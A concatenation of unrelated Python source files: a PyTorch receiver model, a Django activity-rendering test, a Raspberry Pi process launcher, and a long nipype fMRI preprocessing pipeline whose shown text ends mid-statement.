feature_vectors = feature_vectors.view(batch_size, num_imgs, -1) # b * num_imgs * 1 * self.hidden_size
emb_msg = self.receiver_encoder(message).unsqueeze(1)
img_msg = torch.Tensor([]).to(feature_vectors.device)
for i in range(num_imgs):
# compute img/message similarity score
img_msg = torch.cat((img_msg, torch.bmm(feature_vectors[:, i, :].unsqueeze(1), torch.transpose(emb_msg, 2, 1))), 1)
probs = F.softmax(img_msg, 1).squeeze(-1)
distr = Categorical(probs=probs)
if self.training:
choice = distr.sample()
else:
choice = probs.argmax(dim=1)
log_probs = distr.log_prob(choice)
entropy = None
return choice, log_probs, entropy
def load_vision(self):
ckpt = torch.load(self.vision_ckpt)
hp = ckpt["hyperparams"]
params = ckpt["model"]
model = Model(ndf=hp["ndf"], n_classes=hp["n_classes"], n_rkhs=hp["n_rkhs"],
n_depth=hp["n_depth"], encoder_size=hp["encoder_size"])
model.load_state_dict(params)
self.vision = model.encoder
print("Loaded checkpoint from {:s}.".format(self.vision_ckpt))
|
from colossus.apps.campaigns.tests.factories import (
CampaignFactory, EmailFactory, LinkFactory,
)
from colossus.apps.subscribers.activities import render_activity
from colossus.apps.subscribers.constants import ActivityTypes
from colossus.apps.subscribers.tests.factories import ActivityFactory
from colossus.test.testcases import TestCase
class RenderActivityTests(TestCase):
def setUp(self):
self.campaign = CampaignFactory()
self.email = EmailFactory(campaign=self.campaign)
self.link = LinkFactory(email=self.email)
def test_render_activity_without_renderer(self):
"""
Test if the render_activity function is handling all keys in the ActivityTypes
If a new key is added to ActivityTypes and the render_activity is not aware, this test
will fail by raise an KeyError exception.
"""
for activity_type in ActivityTypes.LABELS.keys():
with self.subTest(activity_type=activity_type):
activity = ActivityFactory(activity_type=activity_type, email=self.email, link=self.link)
activity.activity_type = activity_type
self.assertNotEqual('', render_activity(activity))
|
#!/usr/bin/env python3
import subprocess
import os
p1 = subprocess.Popen(["/usr/local/bin/processing-java", "--sketch=/home/pi/pi_cube/main", "--run"])
os.chdir("/home/pi/pi_cube/sol")
p2 = subprocess.Popen(["python3", "sol.py"])
try:
p1.wait()
p2.wait()
except KeyboardInterrupt:
try:
p1.terminate()
p2.terminate()
except OSError:
pass
p1.wait()
p2.wait()
|
# coding: utf-8
# ### Preprocessing Pipeline
# 1. Create a BIDSDataGrabber Node to read data files
# 2. Create a IdentityInterface - infosource Node to iterate over multiple Subjects
# 3. Create following Nodes for preprocessing
# - [x] Exclude 4 volumes from the functional scan
# - [x] slice time correction
# - [x] motion correction and saving the motion parameters
# - [x] Registration of functional data to anatomical and anatomical to standard space to create
# transformation matrices.
# - [x] Registering the atlas to the functional space
from bids.grabbids import BIDSLayout
from nipype.interfaces.fsl import (BET, ExtractROI, FAST, FLIRT, ImageMaths,
MCFLIRT, SliceTimer, Threshold,Info, ConvertXFM,MotionOutliers)
from nipype.interfaces.afni import Resample
from nipype.interfaces.io import DataSink
from nipype.pipeline import Node, MapNode, Workflow, JoinNode
from nipype.interfaces.utility import IdentityInterface, Function
import os
from os.path import join as opj
from nipype.interfaces import afni
import nibabel as nib
import json
from confounds import wf_main_for_masks as wfm
from confounds import wf_tissue_priors as wftp
# import logging
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.DEBUG)
#
# # create a file handler
# handler = logging.FileHandler('progress.log')
#
# # add the handlers to the logger
# logger.addHandler(handler)
# Paths
# path_cwd = os.getcwd()
# path_split_list = path_cwd.split('/')
# s = path_split_list[0:-1] # for getting to the parent dir of pwd
# s = opj('/',*s) # *s converts list to path, # very important to add '/' in the begining so it is read as directory later
#
#
# # json_path = opj(data_directory,'task-rest_bold.json')
#
# json_path = 'scripts/json/paths.json'
# with open(json_path, 'rt') as fp:
# task_info = json.load(fp)
#
#
#
# # In[851]:
#
#
# base_directory = opj(s,task_info["base_directory_for_results"])
# parent_wf_directory = task_info["parent_wf_directory"]
# motion_correction_bet_directory = task_info["motion_correction_bet_directory"]
# coreg_reg_directory = task_info["coreg_reg_directory"]
# atlas_resize_reg_directory = task_info["atlas_resize_reg_directory"]
# data_directory = opj(s,task_info["data_directory"])
# datasink_name = task_info["datasink_name"]
#
# atlasPath = opj(s,task_info["atlas_path"])
#
# layout = BIDSLayout(data_directory)
#
# # number_of_subjects = 4 # Number of subjects you wish to preprocess
#
# subject_list = (layout.get_subjects())[0:number_of_subjects]
def main(paths, options_binary_string, ANAT , DO_FAST=False, num_proc = 7):
json_path=paths['json_path']
base_directory=paths['base_directory']
motion_correction_bet_directory=paths['motion_correction_bet_directory']
parent_wf_directory=paths['parent_wf_directory']
# functional_connectivity_directory=paths[4]
coreg_reg_directory=paths['coreg_reg_directory']
atlas_resize_reg_directory=paths['atlas_resize_reg_directory']
subject_list = paths['subject_list']
datasink_name=paths['datasink_name']
# fc_datasink_name=paths[9]
atlasPath=paths['atlasPath']
# brain_path=paths[11]
# mask_path=paths[12]
# atlas_path=paths[13]
# tr_path=paths[14]
# motion_params_path=paths[15]
# func2std_mat_path=paths[16]
# MNI3mm_path=paths[17]
# demographics_file_path = paths[18]
# phenotype_file_path = paths[19]
data_directory = paths['data_directory']
number_of_subjects = len(subject_list)
print("Working with ",number_of_subjects," subjects.")
# Options:
# discard 4 Volumes (extract), slicetimer, mcflirt
print('Preprocessing Options:')
print('Skipping 4 dummy volumes - ',options_binary_string[0])
print('Slicetiming correction - ',options_binary_string[1])
print('Finding Motion Outliers - ',options_binary_string[2])
print('Doing Motion Correction - ',options_binary_string[3])
motionOutliersOption = options_binary_string[2]
# Create our own custom function - BIDSDataGrabber using a Function Interface.
# In[858]:
def get_nifti_filenames(subject_id,data_dir):
# Remember that all the necesary imports need to be INSIDE the function for the Function Interface to work!
from bids.grabbids import BIDSLayout
layout = BIDSLayout(data_dir) # TODO takes lot of time to execute. Move it out in the next version
# DEBUG Tried moving out. gave deep copy error..
run = 1
session = 1
if session != 0:
anat_file_path = [f.filename for f in layout.get(subject=subject_id, type='T1w', session = session, run=run, extensions=['nii', 'nii.gz'])]
func_file_path = [f.filename for f in layout.get(subject=subject_id, type='bold',session = session, run=run, extensions=['nii', 'nii.gz'])]
else:
anat_file_path = [f.filename for f in layout.get(subject=subject_id, type='T1w' , extensions=['nii', 'nii.gz'])]
func_file_path = [f.filename for f in layout.get(subject=subject_id, type='bold', run=run, extensions=['nii', 'nii.gz'])]
if len(func_file_path) == 0:
print('Error with subject ID %s' % subject_id )
raise Exception('No Functional File with subject ID %s' % subject_id)
if len(anat_file_path) == 0:
return None, func_file_path[0] # No Anatomical files present
return anat_file_path[0],func_file_path[0]
BIDSDataGrabber = Node(Function(function=get_nifti_filenames, input_names=['subject_id','data_dir'],
output_names=['anat_file_path','func_file_path']), name='BIDSDataGrabber')
# BIDSDataGrabber.iterables = [('subject_id',subject_list)]
BIDSDataGrabber.inputs.data_dir = data_directory
# ## Return TR
# def get_TR(in_file):
# from bids.grabbids import BIDSLayout
# import json
#
# json_path = 'scripts/json/paths.json'
#
# with open(json_path, 'rt') as fp:
# task_info = json.load(fp)
# data_directory = task_info["data_directory"]
#
#
# # data_directory = '/home1/shared/ABIDE_1/UM_1'
# layout = BIDSLayout(data_directory)
# metadata = layout.get_metadata(path=in_file)
# TR = metadata['RepetitionTime']
# return TR
# ---------------- Added new Node to return TR and other slice timing correction params-------------------------------
def _getMetadata(in_file, data_directory):
from bids.grabbids import BIDSLayout
import json
# json_path = 'scripts/json/paths.json'
#
# with open(json_path, 'rt') as fp:
# task_info = json.load(fp)
# data_directory = task_info["data_directory"]
# import logging
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.DEBUG)
#
# # create a file handler
# handler = logging.FileHandler('progress.log')
#
# # add the handlers to the logger
# logger.addHandler(handler)
interleaved = True
index_dir = False
# data_directory = '/mnt/project1/home1/varunk/data/ABIDE2RawDataBIDS'
# data_directory = '/home1/shared/ABIDE_1/UM_1'
layout = BIDSLayout(data_directory)
metadata = layout.get_metadata(path=in_file)
print(metadata)
try: tr = metadata['RepetitionTime']
except KeyError:
print('Key RepetitionTime not found in task-rest_bold.json so using a default of 2.0 ')
tr = 2
try: slice_order = metadata['SliceAcquisitionOrder']
except KeyError:
print('Key SliceAcquisitionOrder not found in task-rest_bold.json so using a default of interleaved ascending ')
return tr, index_dir, interleaved
if slice_order.split(' ')[0] == 'Sequential':
interleaved = False
if slice_order.split(' ')[1] == 'Descending':
index_dir = True
return tr, index_dir, interleaved
getMetadata = Node(Function(function=_getMetadata, input_names=['in_file','data_directory'],
output_names=['tr','index_dir','interleaved']), name='getMetadata')
getMetadata.inputs.data_directory = data_directory
# ### Skipping 4 starting scans
# Extract ROI for skipping first 4 scans of the functional data
# > **Arguments:**
# t_min: (corresponds to time dimension) Denotes the starting time of the inclusion
# t_size: Denotes the number of scans to include
#
# The logic behind skipping 4 initial scans is to take scans after the subject has stabalized in the scanner.
# In[863]:
# ExtractROI - skip dummy scans
extract = Node(ExtractROI(t_min=4, t_size=-1),
output_type='NIFTI',
name="extract")
# ### Slice time correction
# Created a Node that does slice time correction
# > **Arguments**:
# index_dir=False -> Slices were taken bottom to top i.e. in ascending order
# interleaved=True means odd slices were acquired first and then even slices [or vice versa(Not sure)]
slicetimer = Node(SliceTimer(
output_type='NIFTI'
),
name="slicetimer")
# ### Motion Correction
# Motion correction is done using fsl's mcflirt. It alligns all the volumes of a functional scan to each other
# MCFLIRT - motion correction
mcflirt = Node(MCFLIRT( mean_vol=True,
save_plots=True,
output_type='NIFTI'),
name="mcflirt")
# Just a dummy node to transfer the output of Mcflirt to the next workflow. Needed if we didnt want to use the Mcflirt
from_mcflirt = Node(IdentityInterface(fields=['in_file']),
name="from_mcflirt")
# ### Skull striping
# I used fsl's BET
# In[868]:
skullStrip = Node(BET(mask=False, frac=0.3, robust=True ),name='skullStrip') #
# *Note*: Do not include special characters in ```name``` field above coz then wf.writegraph will cause issues
# ## Resample
# I needed to resample the anatomical file from 1mm to 3mm. Because registering a 1mm file was taking a huge amount of time.
#
# In[872]:
# Resample - resample anatomy to 3x3x3 voxel resolution
resample_mni = Node(Resample(voxel_size=(3, 3, 3), resample_mode='Cu', # cubic interpolation
outputtype='NIFTI'),
name="resample_mni")
resample_anat = Node(Resample(voxel_size=(3, 3, 3), resample_mode='Cu', # cubic interpolation
outputtype='NIFTI'),
name="resample_anat")
# In[873]:
resample_atlas = Node(Resample(voxel_size=(3, 3, 3), resample_mode='NN', # cubic interpolation
outputtype='NIFTI'),
name="resample_atlas")
resample_atlas.inputs.in_file = atlasPath
# # Matrix operations
# ### For concatenating the transformation matrices
concat_xform = Node(ConvertXFM(concat_xfm=True),name='concat_xform')
# Node to calculate the inverse of func2std matrix
inv_mat = Node(ConvertXFM(invert_xfm=True), name='inv_mat')
# ## Extracting the mean brain
meanfunc = Node(interface=ImageMaths(op_string='-Tmean',
suffix='_mean'),
name='meanfunc')
meanfuncmask = Node(interface=BET(mask=True,
no_output=True,
frac=0.3),
name='meanfuncmask')
# ## Apply Mask
# Does BET (masking) on the whole func scan [Not using this, creates bug for join node]
maskfunc = Node(interface=ImageMaths(suffix='_bet',
op_string='-mas'),
name='maskfunc')
# Does BET (masking) on the mean func scan and outputting the mask as well as masked mean functional image
maskfunc4mean = Node(interface=ImageMaths(suffix='_bet',
op_string='-mas'),
name='maskfunc4mean')
# ## Datasink
# I needed to define the structure of what files are saved and where.
# Create DataSink object
dataSink = Node(DataSink(), name='datasink')
# Name of the output folder
dataSink.inputs.base_directory = opj(base_directory,datasink_name)
# Define substitution strings so that the data is similar to BIDS
substitutions = [('_subject_id_', 'sub-'),
('_resample_brain_flirt.nii_brain', ''),
('_roi_st_mcf_flirt.nii_brain_flirt', ''),
('task-rest_run-1_bold_roi_st_mcf.nii','motion_params')
# ('T1w_resample_brain_flirt_sub-0050002_task-rest_run-1_bold_roi_st_mcf_mean_bet_flirt','fun2std')
]
# Feed the substitution strings to the DataSink node
dataSink.inputs.substitutions = substitutions
# ### Apply Mask to functional data
# Mean file of the motion corrected functional scan is sent to
# skullStrip to get just the brain and the mask_image.
# Mask_image is just a binary file (containing 1 where brain is present and 0 where it isn't).
# After getting the mask_image form skullStrip, apply that mask to aligned
# functional image to extract its brain and remove the skull
# In[889]:
# Function
# in_file: The file on which you want to apply mask
# in_file2 = mask_file: The mask you want to use. Make sure that mask_file has same size as in_file
# out_file : Result of applying mask in in_file -> Gives the path of the output file
def applyMask_func(in_file, in_file2):
import numpy as np
import nibabel as nib
import os
from os.path import join as opj
# convert from unicode to string : u'/tmp/tmp8daO2Q/..' -> '/tmp/tmp8daO2Q/..' i.e. removes the prefix 'u'
mask_file = in_file2
brain_data = nib.load(in_file)
mask_data = nib.load(mask_file)
brain = brain_data.get_data().astype('float32')
mask = mask_data.get_data()
# applying mask by multiplying elementwise to the binary mask
if len(brain.shape) == 3: # Anat file
brain = np.multiply(brain,mask)
elif len(brain.shape) > 3: # Functional File
for t in range(brain.shape[-1]):
brain[:,:,:,t] = np.multiply(brain[:,:,:,t],mask)
else:
pass
# Saving the brain file
path = os.getcwd()
in_file_split_list = in_file.split('/')
in_file_name = in_file_split_list[-1]
out_file = in_file_name + '_brain.nii.gz' # changing name
brain_with_header = nib.Nifti1Image(brain, affine=brain_data.affine,header = brain_data.header)
nib.save(brain_with_header,out_file)
out_file = opj(path,out_file)
out_file2 = in_file2
return out_file, out_file2
# #### Things learnt:
# 1. I found out that whenever a node is being executed, it becomes the current directory and whatever file you create now, will be stored here.
# 2. #from IPython.core.debugger import Tracer; Tracer()() # Debugger doesnt work in nipype
# Wrap the above function inside a Node
# In[890]:
applyMask = Node(Function(function=applyMask_func, input_names=['in_file','in_file2'],
output_names=['out_file','out_file2']), name='applyMask')
# ### Some nodes needed for Co-registration and Normalization
# Node for getting the xformation matrix
func2anat_reg = Node(FLIRT(output_type='NIFTI'), name="func2anat_reg")
# Node for applying xformation matrix to functional data
func2std_xform = Node(FLIRT(output_type='NIFTI',
apply_xfm=True), name="func2std_xform")
# Node for applying xformation matrix to functional data
std2func_xform = Node(FLIRT(output_type='NIFTI',
apply_xfm=True, interp='nearestneighbour'), name="std2func_xform")
# Node for Normalizing/Standardizing the anatomical and getting the xformation matrix
anat2std_reg = Node(FLIRT(output_type='NIFTI'), name="anat2std_reg")
# I wanted to use the MNI file as input to the workflow so I created an Identity
# Node that reads the MNI file path and outputs the same MNI file path.
# Then I connected this node to whereever it was needed.
MNI152_2mm = Node(IdentityInterface(fields=['standard_file','mask_file']),
name="MNI152_2mm")
# Set the mask_file and standard_file input in the Node. This setting sets the input mask_file permanently.
MNI152_2mm.inputs.mask_file = os.path.expandvars('$FSLDIR/data/standard/MNI152_T1_2mm_brain_mask.nii.gz')
MNI152_2mm.inputs.standard_file = os.path.expandvars('$FSLDIR/data/standard/MNI152_T1_2mm_brain.nii.gz')
# MNI152_2mm.inputs.mask_file = '/usr/share/fsl/5.0/data/standard/MNI152_T1_2mm_brain_mask.nii.gz'
# MNI152_2mm.inputs.standard_file = '/usr/share/fsl/5.0/data/standard/MNI152_T1_2mm_brain.nii.gz'
# ## Band Pass Filtering
# Let's do a band pass filtering on the data using the code from https://neurostars.org/t/bandpass-filtering-different-outputs-from-fsl-and-nipype-custom-function/824/2
### AFNI
bandpass = Node(afni.Bandpass(highpass=0.008, lowpass=0.08,
despike=False, no_detrend=True, notrans=True,
outputtype='NIFTI_GZ'),name='bandpass')
def save_file_list_function_in_brain(in_brain):
import numpy as np
import os
from os.path import join as opj
file_list = np.asarray(in_brain)
print('######################## File List ######################: \n',file_list)
np.save('brain_file_list',file_list)
file_name = 'brain_file_list.npy'
# out_brain = opj(os.getcwd(),file_name) # path
out_brain = os.path.abspath(file_name)
return out_brain
def save_file_list_function_in_mask(in_mask):
import numpy as np
import os
from os.path import join as opj
file_list2 = np.asarray(in_mask)
print('######################## File List ######################: \n',file_list2)
np.save('mask_file_list',file_list2)
file_name2 = 'mask_file_list.npy'
# out_mask = opj(os.getcwd(),file_name2) # path
out_mask = os.path.abspath(file_name2)
return out_mask
def save_file_list_function_in_motion_params(in_motion_params):
import numpy as np
import os
from os.path import join as opj
file_list3 = np.asarray(in_motion_params)
print('######################## File List ######################: \n',file_list3)
np.save('motion_params_file_list',file_list3)
file_name3 = 'motion_params_file_list.npy'
# out_motion_params = opj(os.getcwd(),file_name3) # path
out_motion_params = os.path.abspath(file_name3)
return out_motion_params
def save_file_list_function_in_motion_outliers(in_motion_outliers):
import numpy as np
import os
from os.path import join as opj
file_list4 = np.asarray(in_motion_outliers)
print('######################## File List ######################: \n',file_list4)
np.save('motion_outliers_file_list',file_list4)
file_name4 = 'motion_outliers_file_list.npy'
# out_motion_outliers = opj(os.getcwd(),file_name4) # path
out_motion_outliers = os.path.abspath(file_name4)
return out_motion_outliers
def save_file_list_function_in_joint_xformation_matrix(in_joint_xformation_matrix):
import numpy as np
import os
from os.path import join as opj
file_list5 = np.asarray(in_joint_xformation_matrix)
print('######################## File List ######################: \n',file_list5)
np.save('joint_xformation_matrix_file_list',file_list5)
file_name5 = 'joint_xformation_matrix_file_list.npy'
# out_joint_xformation_matrix = opj(os.getcwd(),file_name5) # path
out_joint_xformation_matrix = os.path.abspath(file_name5)
return out_joint_xformation_matrix
def save_file_list_function_in_tr(in_tr):
import numpy as np
import os
from os.path import join as opj
tr_list = np.asarray(in_tr)
print('######################## TR List ######################: \n',tr_list)
np.save('tr_list',tr_list)
file_name6 = 'tr_list.npy'
# out_tr = opj(os.getcwd(),file_name6) # path
out_tr = os.path.abspath(file_name6)
return out_tr
def save_file_list_function_in_atlas(in_atlas):
import numpy as np
import os
from os.path import join as opj
file_list7 = np.asarray(in_atlas)
print('######################## File List ######################: \n',file_list7)
np.save('atlas_file_list',file_list7)
file_name7 = 'atlas_file_list.npy'
# out_atlas = opj(os.getcwd(),file_name7) # path
out_atlas = os.path.abspath(file_name7)
return out_atlas
def save_file_list_function_in_confound_masks(in_csf_mask, in_wm_mask):
import numpy as np
import os
from os.path import join as opj
file_list8 = np.asarray(in_csf_mask)
print('######################## File List ######################: \n',file_list8)
np.save('csf_mask_file_list',file_list8)
file_name8 = 'csf_mask_file_list.npy'
# out_csf_mask = opj(os.getcwd(),file_name8) # path
out_csf_mask = os.path.abspath(file_name8)
file_list9 = np.asarray(in_wm_mask)
print('######################## File List ######################: \n',file_list9)
np.save('wm_mask_file_list',file_list9)
file_name9 = 'wm_mask_file_list.npy'
# out_wm_mask = opj(os.getcwd(),file_name9) # path
out_wm_mask = os.path.abspath(file_name9)
return out_csf_mask, out_wm_mask
def func_create_qc_csv(in_dict):
import pandas as pd
import os
from os.path import join as opj
import numpy as np
df = pd.DataFrame()
dict_list = np.asarray(in_dict)
for dict in dict_list:
_df = pd.DataFrame(dict)
df = df.append(_df)
print('########## DataFrame ########',df)
file_name = 'qc.csv'
df.to_csv(file_name,index=False)
# qc_csv = opj(os.getcwd(),file_name) # path
qc_csv = os.path.abspath(file_name)
return qc_csv
save_file_list_in_brain = JoinNode(Function(function=save_file_list_function_in_brain, input_names=['in_brain'],
output_names=['out_brain']),
joinsource="infosource",
joinfield=['in_brain'],
name="save_file_list_in_brain")
save_file_list_in_mask = JoinNode(Function(function=save_file_list_function_in_mask, input_names=['in_mask'],
output_names=['out_mask']),
joinsource="infosource",
joinfield=['in_mask'],
name="save_file_list_in_mask")
save_file_list_in_motion_outliers = JoinNode(Function(function=save_file_list_function_in_motion_outliers, input_names=['in_motion_outliers'],
output_names=['out_motion_outliers']),
joinsource="infosource",
joinfield=['in_motion_outliers'],
name="save_file_list_in_motion_outliers")
save_file_list_in_motion_params = JoinNode(Function(function=save_file_list_function_in_motion_params, input_names=['in_motion_params'],
output_names=['out_motion_params']),
joinsource="infosource",
joinfield=['in_motion_params'],
name="save_file_list_in_motion_params")
save_file_list_in_joint_xformation_matrix = JoinNode(Function(function=save_file_list_function_in_joint_xformation_matrix, input_names=['in_joint_xformation_matrix'],
output_names=['out_joint_xformation_matrix']),
joinsource="infosource",
joinfield=['in_joint_xformation_matrix'],
name="save_file_list_in_joint_xformation_matrix")
save_file_list_in_tr = JoinNode(Function(function=save_file_list_function_in_tr, input_names=['in_tr'],
output_names=['out_tr']),
joinsource="infosource",
joinfield=['in_tr'],
name="save_file_list_in_tr")
save_file_list_in_atlas = JoinNode(Function(function=save_file_list_function_in_atlas, input_names=['in_atlas'],
output_names=['out_atlas']),
joinsource="infosource",
joinfield=['in_atlas'],
name="save_file_list_in_atlas")
save_file_list_in_confound_masks = JoinNode(Function(function=save_file_list_function_in_confound_masks, input_names=['in_csf_mask', 'in_wm_mask'],
output_names=['out_csf_mask', 'out_wm_mask']),
joinsource="infosource",
joinfield=['in_csf_mask', 'in_wm_mask'],
name="save_file_list_in_confound_masks")
save_qc_csv = JoinNode(Function(function=func_create_qc_csv, input_names=['in_dict'],
output_names=['qc_csv']),
joinsource="infosource",
joinfield=['in_dict'],
name="save_qc_csv")
# ### Motion outliers
motionOutliers = Node(MotionOutliers(no_motion_correction=False,metric='fd', out_metric_plot = 'fd_plot.png',
out_metric_values='fd_raw.txt'),name='motionOutliers')
# -------------------------FAST -----------------------------------------------------------------------------------------------------
if DO_FAST:
wf_confound_masks = wfm.get_wf_main(name='wf_main_masks')
wf_confound_masks.inputs.inputspec.brain_mask_eroded = \
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/brain_mask_2mm_eroded_18mm.nii.gz'
wf_confound_masks.inputs.inputspec.threshold = 0.5
wf_confound_masks.inputs.inputspec.csf_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/created_tissue_priors/csf_prior_mask.nii.gz'
wf_confound_masks.inputs.inputspec.wm_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/created_tissue_priors/wm_prior_mask.nii.gz'
# ----------------------------No FAST -----------------------------------------------------------
# TODO
if not DO_FAST:
wf_confound_masks = wftp.get_wf_tissue_priors(name='get_wf_tissue_priors')
wf_confound_masks.inputs.inputspec.csf_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/created_tissue_priors/csf_prior_mask.nii.gz'
wf_confound_masks.inputs.inputspec.wm_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/created_tissue_priors/wm_prior_mask.nii.gz'
wf_confound_masks.inputs.inputspec.threshold = 0.5
# wf_confound_masks.inputs.inputspec.reference_func_file_path =
# wf_confound_masks.inputs.inputspec.std2func_mat_path =
# ## Workflow for atlas registration from std to functional
wf_atlas_resize_reg = Workflow(name=atlas_resize_reg_directory)
wf_coreg_reg_to_wf_confound_masks = Node(IdentityInterface(fields=['reference_func_file_path', 'resampled_anat_file_path', 'func2anat_mat_path']),
name="wf_coreg_reg_to_wf_confound_masks")
# Apply the inverse matrix to the 3mm Atlas to transform it to func space
wf_atlas_resize_reg.connect(maskfunc4mean, 'out_file', std2func_xform, 'reference')
wf_atlas_resize_reg.connect(resample_atlas, 'out_file', std2func_xform,'in_file')
# Now, applying the inverse matrix
wf_atlas_resize_reg.connect(inv_mat, 'out_file', std2func_xform ,'in_matrix_file') # output: Atlas in func space
wf_atlas_resize_reg.connect(std2func_xform, 'out_file', save_file_list_in_atlas,'in_atlas')
wf_atlas_resize_reg.connect(inv_mat, 'out_file', wf_confound_masks, 'inputspec.std2func_mat_path')
# Sending to wf_confound_masks
wf_atlas_resize_reg.connect(wf_coreg_reg_to_wf_confound_masks,'reference_func_file_path', wf_confound_masks, 'inputspec.reference_func_file_path')
if DO_FAST:
wf_atlas_resize_reg.connect(wf_coreg_reg_to_wf_confound_masks,'resampled_anat_file_path', wf_confound_masks, 'inputspec.resampled_anat_file_path')
wf_atlas_resize_reg.connect(wf_coreg_reg_to_wf_confound_masks,'func2anat_mat_path', wf_confound_masks, 'inputspec.func2anat_mat_path')
# Creating and saving the QC CSV
wf_atlas_resize_reg.connect(wf_confound_masks,'outputspec.qc_stats_dict', save_qc_csv, 'in_dict')
wf_atlas_resize_reg.connect(save_qc_csv, 'qc_csv', dataSink, 'qc_csv.@qc_csv')
# Getting the outputs from wf_confound_masks workflow
wf_atlas_resize_reg.connect(wf_confound_masks, 'outputspec.csf_tissue_prior_path',
save_file_list_in_confound_masks, 'in_csf_mask' )
wf_atlas_resize_reg.connect(wf_confound_masks, 'outputspec.wm_tissue_prior_path',
save_file_list_in_confound_masks, 'in_wm_mask' )
wf_atlas_resize_reg.connect(save_file_list_in_confound_masks, 'out_csf_mask', dataSink, 'csf_mask_paths.@out_csf_tissue_prior_mask')
wf_atlas_resize_reg.connect(save_file_list_in_confound_masks, 'out_wm_mask', dataSink, 'wm_mask_paths.@out_wm_tissue_prior_mask')
# ---------------------------Save the required files --------------------------------------------
# wf_atlas_resize_reg.connect([(save_file_list_in_motion_params, dataSink, [('out_motion_params','motion_params_paths.@out_motion_params')])])
# if motionOutliersOption == 1:
# wf_atlas_resize_reg.connect([(save_file_list_in_motion_outliers, dataSink, [('out_motion_outliers','motion_outliers_paths.@out_motion_outliers')])])
# Move the below statements to the respective workflows
# Lesson learnt: A node inside a workflow (let's say WF_1) is not a global entity. That is, to direct output of that node to a datasink (which is a global entity), the .connect() should
# be written in that workflow only and will not work .connect() is written in some other workflow.
"""
Lesson learnt: (Specific to nested workflows)
A node (let's say N_1) inside a workflow (let's say WF_1) is
not a global entity. That is, to direct the output of that node (N_1) to
a datasink (which is a global entity), the
.connect(N_1, 'Output' ,DataSink, 'Input') should be written in that
workflow only, i.e. WF_1.connect(N_1, 'Output' ,DataSink, 'Input').
And will not work if .connect(N_1,_,_,_) is written in some other
workflow. I was writing all the datasink .connect() statements in a
different workflow that was nested in WF_1.
"""
# wf_atlas_resize_reg.connect([(save_file_list_in_brain, dataSink, [('out_brain','preprocessed_brain_paths.@out_brain')])])
# wf_atlas_resize_reg.connect([(save_file_list_in_mask, dataSink, [('out_mask','preprocessed_mask_paths.@out_mask')])])
# wf_atlas_resize_reg.connect([(save_file_list_in_joint_xformation_matrix, dataSink, [('out_joint_xformation_matrix',
# 'joint_xformation_matrix_paths.@out_joint_xformation_matrix')])])
# wf_atlas_resize_reg.connect([(save_file_list_in_tr, dataSink, [('out_tr','tr_paths.@out_tr')])])
wf_atlas_resize_reg.connect([(save_file_list_in_atlas, dataSink, [('out_atlas','atlas_paths.@out_atlas')])])
# In[909]:
wf_coreg_reg = Workflow(name=coreg_reg_directory)
# wf_coreg_reg.base_dir = base_directory
# Dir where all the outputs will be stored(inside coregistrationPipeline folder).
wf_motion_correction_bet_to_wf_confound_masks = Node(IdentityInterface(fields=['reference_func_file_path']),
name="wf_motion_correction_bet_to_wf_confound_masks")
if ANAT == 1:
wf_coreg_reg.connect(BIDSDataGrabber,'anat_file_path',skullStrip,'in_file') # Resampled the anat file to 3mm
wf_coreg_reg.connect(skullStrip,'out_file', resample_anat,'in_file')
wf_coreg_reg.connect(resample_anat,'out_file', func2anat_reg,'reference') # Make the resampled file as reference in func2anat_reg
# Sec 1. The above 3 steps registers the mean image to resampled anat image and
# calculates the xformation matrix .. I hope the xformation matrix will be saved
wf_coreg_reg.connect(MNI152_2mm, 'standard_file', resample_mni,'in_file')
wf_coreg_reg.connect(resample_mni, 'out_file', anat2std_reg,'reference')
wf_coreg_reg.connect(resample_anat, 'out_file', anat2std_reg, 'in_file')
# Calculates the Xformationmatrix from anat3mm to MNI 3mm
# We can get those matrices by refering to func2anat_reg.outputs.out_matrix_file and similarly for anat2std_reg
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', concat_xform,'in_file')
wf_coreg_reg.connect(anat2std_reg, 'out_matrix_file', concat_xform,'in_file2')
wf_coreg_reg.connect(concat_xform, 'out_file', dataSink, 'tranformation_matrix_fun2std.@out_file')
wf_coreg_reg.connect(concat_xform, 'out_file', save_file_list_in_joint_xformation_matrix, 'in_joint_xformation_matrix')
# Now inverse the func2std MAT to std2func
wf_coreg_reg.connect(concat_xform, 'out_file', wf_atlas_resize_reg,'inv_mat.in_file')
# For the extraction of the confound masks
wf_coreg_reg.connect(resample_anat, 'out_file', wf_coreg_reg_to_wf_confound_masks, 'resampled_anat_file_path')
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', wf_coreg_reg_to_wf_confound_masks, 'func2anat_mat_path')
wf_coreg_reg.connect(wf_motion_correction_bet_to_wf_confound_masks, 'reference_func_file_path', wf_coreg_reg_to_wf_confound_masks, 'reference_func_file_path')
# Registration of Functional to MNI 3mm space w/o using anatomical
if ANAT == 0:
print('Not using Anatomical high resoulution files')
wf_coreg_reg.connect(MNI152_2mm, 'standard_file', resample_mni,'in_file')
wf_coreg_reg.connect(resample_mni, 'out_file',func2anat_reg,'reference') # Make the resampled file as reference in func2anat_reg
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', dataSink, 'tranformation_matrix_fun2std.@out_file')
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', save_file_list_in_joint_xformation_matrix, 'in_joint_xformation_matrix')
# Now inverse the func2std MAT to std2func
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', wf_atlas_resize_reg,'inv_mat.in_file')
wf_coreg_reg.connect(
save_file_list_in_joint_xformation_matrix, 'out_joint_xformation_matrix',
dataSink, 'joint_xformation_matrix_paths.@out_joint_xformation_matrix')
# ## Co-Registration, Normalization and Bandpass Workflow
# 1. Co-registration means alligning the func to anat
# 2. Normalization means aligning func/anat to standard
# 3. Applied band pass filtering in range - highpass=0.008, lowpass=0.08
# In[910]:
wf_motion_correction_bet = Workflow(name=motion_correction_bet_directory)
# wf_motion_correction_bet.base_dir = base_directory
wf_motion_correction_bet.connect([
